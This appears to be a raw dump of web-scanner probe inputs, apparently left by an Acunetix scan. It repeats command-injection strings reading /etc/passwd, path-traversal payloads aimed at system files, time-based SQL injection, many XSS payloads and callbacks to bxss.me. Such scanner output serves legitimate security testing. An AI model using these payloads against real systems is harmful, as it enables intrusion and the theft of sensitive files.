"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<img/src=">" onerror=alert(966075)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

${100313+99880}

../../../../../../../../../../etc/passwd.jpg

1

1

1

1<ScRiPt%20>prompt(900551)</sCripT>

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n928129=v946775

1

1

1&lt

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

<img acu onmouseover=prompt(987187) //>

)

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

1

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(938103)>

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'|'ld

1

Qsn6qSX9'

'"()

<a href='http://www.acunetix.com'>website security</a>

.\./.\./.\./.\./.\./.\./etc/passwd

^(#$!@#$)(()))******

testasp.vulnweb.com

"|"ld

1

'

HVOr7eE1')

1

[url=http://www.acunetix.com]website security[/url]

1

Q2nwwggz'))

1

1

/etc/passwd

"

1

1

1

1_Oyv5T <ScRiPt >prompt(945911)</ScRiPt>

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

1

1

${@print(md5(acunetix_wvs_security_test))}\

"

1

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hitmHXhfPkcuw.bxss.me/

-1))

1

||cat /etc/passwd

1

1

comments

................etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

tG34sqrL'

1

1

1

&dir

1

comments

http://www.acunetix.tst

1

gUetOl9X')

1

file:///etc/passwd

1

'&dir&'

'"

1'"()&%<ScRiPt >prompt(912140)</ScRiPt>

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

QyqpUty4'))

1

1

"&dir&"

<!--

'"()&%<ScRiPt >prompt(922222)</ScRiPt>

1

1

1

1

WEB-INF/web.xml

1

1_939027

|dir

1

1

1

WEB-INF\web.xml

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

"|dir

acu7855<s1﹥s2ʺs3ʹuca7855

1

1

1

../../../../../../../../../../boot.ini

1

acux4789z1z2abcxuca4789

1

1<ScRiPt >prompt(967285)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(937626)</script>

1

1

windowswin.ini

1

1<ScRiPt >prompt(927124)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?981639></ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(976723)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(952753)">

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(957206)"></g></svg>

1

1

1<div style=width:expression(prompt(961088))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

&cat /etc/passwd&

1<iframe src='data:text/html

response.write(9673317*9800503)

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9673317*9800503)+'

1<body onload=prompt(930447)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9673317*9800503)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997591)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1<img src=xyz OnErRor=prompt(918354)>

1

if(now()=sysdate(),sleep(6.374),0)/*'XOR(if(now()=sysdate(),sleep(6.374),0))OR'"XOR(if(now()=sysdate(),sleep(6.374),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

1

WEB-INF\web.xml

1<img/src=">" onerror=alert(966856)>

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(6.374)))v)/*'+(select(0)from(select(sleep(6.374)))v)+'"+(select(0)from(select(sleep(6.374)))v)+"*/

1

1

${99515+100494}

1

1

1<ScRiPt%20>prompt(947281)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1

1&lt

1&n997690=v947323

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

1some_inexistent_file_with_long_name%00.jpg

1

<img acu onmouseover=prompt(977988) //>

)

1

"|"ld

1

.\./.\./.\./.\./.\./.\./etc/passwd

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

1<input autofocus onfocus=prompt(936707)>

!(()&&!|*|*|

6ITDhGTP'

1

/etc/passwd

testasp.vulnweb.com

'

1

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

iAqXlr4n')

"

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

HN0bbHMD'))

1

${@print(md5(acunetix_wvs_security_test))}

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1_fTAcX <ScRiPt >prompt(902690)</ScRiPt>

-1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

1

................etc/passwd

1

-1)

1

1

http://hitP0eVHIJVBd.bxss.me/

&dir

comments

1

1

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

comments

1

-1))

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

comments

-1))

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

-1))

1

comments

mLYtxF0y'

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

comments

ZaVv1VUm'

1

1

file:///etc/passwd

1

1

1

"&dir&"

comments/.

fj2M55wU')

http://www.acunetix.tst

KGNcZNmt')

1

1

file:///etc/passwd

1

1

1

"&dir&"

comments/.

http://www.acunetix.tst

iBhQwaIW'))

1

1

file:///etc/passwd

1

1

1

"&dir&"

comments/.

http://www.acunetix.tst

YFPea6yl'))

wqTYW9ps'))

1

1

file:///etc/passwd

1

1

1

"&dir&"

comments/.

http://www.acunetix.tst

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(950039)</ScRiPt>

|dir

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(950039)</ScRiPt>

|dir

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(950039)</ScRiPt>

|dir

1

1

1

'"()&%<ScRiPt >prompt(973011)</ScRiPt>

<!--

1

WEB-INF/web.xml

1

1

'|dir

1

1

1_979786

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu8588<s1﹥s2ʺs3ʹuca8588

1

1

1

1

1

windowswin.ini

acux4384z1z2abcxuca4384

1

1

1

1<ScRiPt >prompt(976450)</ScRiPt>

................windowswin.ini

1

1

1<script>prompt(942074)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(989029)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977066></ScRiPt>

1

1

1<ScRiPt >prompt(989756)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(974295)">

1

response.write(9317218*9649019)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969467)"></g></svg>

'+response.write(9317218*9649019)+'

1

&cat /etc/passwd&

1

1<div style=width:expression(prompt(994048))>

1

"+response.write(9317218*9649019)+"

WEB-INF/web.xml

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1<body onload=prompt(986029)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952269)>

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1<img src=xyz OnErRor=prompt(965594)>

${99568+100029}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

1

-1))

1

1

1<img/src=">" onerror=alert(915210)>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

VagBUfpN'

1&n946397=v996686

1

1<ScRiPt%20>prompt(950722)</sCripT>

)

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

MM1ZL0Pk')

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

'"()

1&lt

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

7LFun2fX'))

1

^(#$!@#$)(()))******

.\./.\./.\./.\./.\./.\./etc/passwd

1

<img acu onmouseover=prompt(994365) //>

testasp.vulnweb.com

1

'

-1

1

1

1<input autofocus onfocus=prompt(904161)>

1

/etc/passwd

'

1

1

"

<a href='http://www.acunetix.com'>website security</a>

-1)

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

-1))

1

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

FUVVSeYZ'

1

1

&dir

1_bGIlU <ScRiPt >prompt(901472)</ScRiPt>

http://hitX9Naknng1y.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

................etc/passwd

1

1

v2xdCgVI')

'&dir&'

comments

1

1

1

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

HoqUXzYF'))

"&dir&"

1

'"

http://www.acunetix.tst

1

file:///etc/passwd

1

1

comments/.

1

<!--

1

1

1

|dir

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(939678)</ScRiPt>

1

1

1

'|dir

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(987259)</ScRiPt>

1

1

1

1

"|dir

1

1_980260

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu10069<s1﹥s2ʺs3ʹuca10069

../../../../../../../../../../boot.ini

1

1

acux8361z1z2abcxuca8361

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(964627)</ScRiPt>

windowswin.ini

1

1

1<script>prompt(902683)</script>

1

................windowswin.ini

1

1<ScRiPt >prompt(916053)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983545></ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(947917)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(966796)">

1

1

response.write(9327724*9635828)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910671)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9327724*9635828)+'

1

1<div style=width:expression(prompt(941868))>

&cat /etc/passwd&

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9327724*9635828)+"

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1<body onload=prompt(987705)>

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959477)>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=xyz OnErRor=prompt(937880)>

1

cat /etc/passwd

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1<img/src=">" onerror=alert(964781)>

1

`cat /etc/passwd`

1

${100471+99615}

1

1

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(929574)</sCripT>

|cat /etc/passwd#

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1))

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

1&n971168=v974596

1some_inexistent_file_with_long_name%00.jpg

'|'ld

SH6IQc15'

1

<img acu onmouseover=prompt(948708) //>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WCwwYYtS')

1

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

1

'"()

"|"ld

vFyw8yA9'))

1<input autofocus onfocus=prompt(975717)>

testasp.vulnweb.com

1

^(#$!@#$)(()))******

1

/etc/passwd

1

-1

<a href='http://www.acunetix.com'>website security</a>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

[url=http://www.acunetix.com]website security[/url]

1

1

1

"

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_ZLNHV <ScRiPt >prompt(961551)</ScRiPt>

-1))

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hit0QAX8vhDHC.bxss.me/

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

................etc/passwd

1

QEzHiLri'

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

nhOQJ18t')

1

'&dir&'

1

1

1

1

comments

file:///etc/passwd

1

T2XMsAQa'))

http://www.acunetix.tst

"&dir&"

'"

1

1

1'"()&%<ScRiPt >prompt(950317)</ScRiPt>

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

|dir

<!--

1

1

'"()&%<ScRiPt >prompt(993800)</ScRiPt>

1

WEB-INF/web.xml

1

'|dir

1

1

1

1_913655

1

"|dir

1

WEB-INF\web.xml

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu2041<s1﹥s2ʺs3ʹuca2041

../../../../../../../../../../boot.ini

1

1

1

acux7405z1z2abcxuca7405

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(921545)</ScRiPt>

1<script>prompt(970818)</script>

1

1

1

windowswin.ini

1<ScRiPt >prompt(959857)</ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995163></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(960859)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<video><source onerror="javascript:prompt(950108)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(904021)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9120069*9584740)

1

1

1<div style=width:expression(prompt(978111))>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9120069*9584740)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<iframe src='data:text/html

"+response.write(9120069*9584740)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

1<body onload=prompt(948131)>

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(972589)>

WEB-INF/web.xml

1

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=xyz OnErRor=prompt(911274)>

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1

1

-1

${99780+99395}

1<img/src=">" onerror=alert(974757)>

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(908247)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n998611=v967575

1

1some_inexistent_file_with_long_name%00.jpg

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

'|'ld

1&lt

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

ZsiqieNn'

.\./.\./.\./.\./.\./.\./etc/passwd

!(()&&!|*|*|

<img acu onmouseover=prompt(993718) //>

"|"ld

1

1

testasp.vulnweb.com

J1tsSxy9')

^(#$!@#$)(()))******

/etc/passwd

'"()

1<input autofocus onfocus=prompt(998632)>

1

'

1

mvQBbvVC'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

"

-1

1

1

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

1_FN3rK <ScRiPt >prompt(978900)</ScRiPt>

http://hitq0x6EbA1Yp.bxss.me/

................etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

acunetix_wvs_invalid_filename

1

1

&dir

1

DUqHCe2l'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

http://www.acunetix.tst

file:///etc/passwd

'&dir&'

1

'"

1

1

xZJ16EwS'

comments

1

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

<!--

1'"()&%<ScRiPt >prompt(999694)</ScRiPt>

7NTU4Drc'

1

1

1

1

WEB-INF/web.xml

|dir

1

MeszdB9d')

'"()&%<ScRiPt >prompt(947515)</ScRiPt>

1

1

'|dir

WEB-INF\web.xml

1

1

1_922057

TiNhilyT'))

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

acu4739<s1﹥s2ʺs3ʹuca4739

1

1

../../../../../../../../../../boot.ini

1

1

1

acux8863z1z2abcxuca8863

1

1<ScRiPt >prompt(910040)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

windowswin.ini

1<script>prompt(949299)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(979323)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994419></ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(914975)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(975113)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962584)"></g></svg>

1

response.write(9090348*9974340)

1

1

1<div style=width:expression(prompt(938711))>

1

WEB-INF/web.xml

1

'+response.write(9090348*9974340)+'

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9090348*9974340)+"

1

1

'&cat /etc/passwd&'

1<body onload=prompt(990722)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911191)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=xyz OnErRor=prompt(966287)>

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<img/src=">" onerror=alert(975287)>

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

1<ScRiPt%20>prompt(900586)</sCripT>

1

|cat /etc/passwd#

${99201+100072}

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

1&n932613=v969559

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

1

)

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

<img acu onmouseover=prompt(946121) //>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

2j75sj2h'

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(956218)>

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

1

testasp.vulnweb.com

'

D15ZZrqt')

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

ZQaHsgo8'))

"

1

1

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

1

-1

1

||cat /etc/passwd

1_SFQo5 <ScRiPt >prompt(940536)</ScRiPt>

1

http://hitb5HjpcA0lU.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

-1)

1

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

comments

1

1

................etc/passwd

-1))

1

1

1

'&dir&'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

v2guc3lc'

http://www.acunetix.tst

1

1

1

"&dir&"

1

comments/.

1

Acsd8pGw')

file:///etc/passwd

'"

1

1

1'"()&%<ScRiPt >prompt(936670)</ScRiPt>

1

|dir

<!--

1

jbinzoWl'))

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(924595)</ScRiPt>

'|dir

1

1

1

1

WEB-INF/web.xml

1

1_952537

1

"|dir

1

1

1

1

WEB-INF\web.xml

1

1

1

acu6320<s1﹥s2ʺs3ʹuca6320

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acux9789z1z2abcxuca9789

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(982921)</ScRiPt>

1

1

1

1

1<script>prompt(997652)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

windowswin.ini

1<ScRiPt >prompt(965307)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936892></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(987077)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<video><source onerror="javascript:prompt(910679)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946703)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(915191))>

1

response.write(9938031*9694085)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1<iframe src='data:text/html

1

'+response.write(9938031*9694085)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<body onload=prompt(952535)>

"+response.write(9938031*9694085)+"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932056)>

"&cat /etc/passwd&"

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(908232)>

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(978653)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

|cat /etc/passwd#

${99242+99310}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(940852)</sCripT>

../../../../../../../../../../etc/passwd.jpg

1

1

1&n919421=v917799

-1)

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

1&lt

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

)

<img acu onmouseover=prompt(969119) //>

1

QZC0Ldrd'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

testasp.vulnweb.com

!(()&&!|*|*|

1<input autofocus onfocus=prompt(936842)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'"()

oqmq02cf')

<a href='http://www.acunetix.com'>website security</a>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

'

^(#$!@#$)(()))******

1

1

1

4c33Quxg'))

1

[url=http://www.acunetix.com]website security[/url]

"

.\./.\./.\./.\./.\./.\./etc/passwd

"

1

1

1

1

-1

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1_z9obh <ScRiPt >prompt(911192)</ScRiPt>

acunetix_wvs_invalid_filename

http://hitiDuhoUoYBc.bxss.me/

1

1

1

||cat /etc/passwd

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

comments

1

1

1

1

1

1

&dir

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

comments/.

1

6yE235I3'

................etc/passwd

1

1

1

'"

1

"&dir&"

1

Ura6ZWuz')

